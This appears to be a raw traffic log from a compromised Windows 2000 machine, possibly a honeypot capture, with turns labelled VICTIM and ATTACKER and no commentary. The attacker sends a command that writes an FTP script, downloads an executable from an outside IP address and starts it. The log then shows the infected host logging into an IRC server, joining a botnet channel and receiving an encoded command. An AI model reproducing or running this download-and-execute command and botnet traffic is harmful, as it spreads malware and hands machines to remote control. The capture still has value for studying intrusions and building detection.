VICTIM: Microsoft Windows 2000 [Version 5.00.2195] VICTIM: (C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> ATTACKER: echo open 205.134.246.121 31925 >> asr_qbmjc &echo user qbmjco qbmjco >> asr_qbmjc &echo get asr_64723.exe >> asr_qbmjc &echo quit >> asr_qbmjc &ftp -nv -s:asr_qbmjc &start asr_64723.exeConnected to 205.134.246.121. ATTACKER: 220 VICTIM: USER qbmjco ATTACKER: 331 VICTIM: PASS qbmjco ATTACKER: 230 VICTIM: PORT 192,168,1,2,4,4 ATTACKER: 200 ATTACKER: RETR asr_64723.exe ATTACKER: 150 VICTIM: open 205.134.246.121 31925 220user qbmjco qbmjco 331230get asr_64723.exe 200150 ATTACKER: 226 VICTIM: 226 VICTIM: QUIT ATTACKER: 221 VICTIM: PASS secretpass VICTIM: NICK P|s4qevjqm8USER jv9954jbg * 0 :USA|2K|492 ATTACKER: :hub.10601.net 001 P|s4qevjqm8 :P|s4qevjqm8!jv9954jbg@192.168.1.2:hub.10601.net 376 P|s4qevjqm8 : VICTIM: USERHOST P|s4qevjqm8 ATTACKER: :hub.10601.net 302 P|s4qevjqm8 :P|s4qevjqm8=+jv9954jbg@192.168.1.2 VICTIM: USERHOST P|s4qevjqm8MODE P|s4qevjqm8 JOIN #mm RSA ATTACKER: :hub.10601.net 302 P|s4qevjqm8 :P|s4qevjqm8=+jv9954jbg@192.168.1.2 :hub.10601.net 221 P|s4qevjqm8 +:P|s4qevjqm8!jv9954jbg@192.168.1.2 JOIN :#mm:hub.10601.net 332 P|s4qevjqm8 #mm :+yOfS7/ZgRdB.u97R71RybXB/oEF380Z.l75.Hok4t048KCX1Lwo5G04miGH1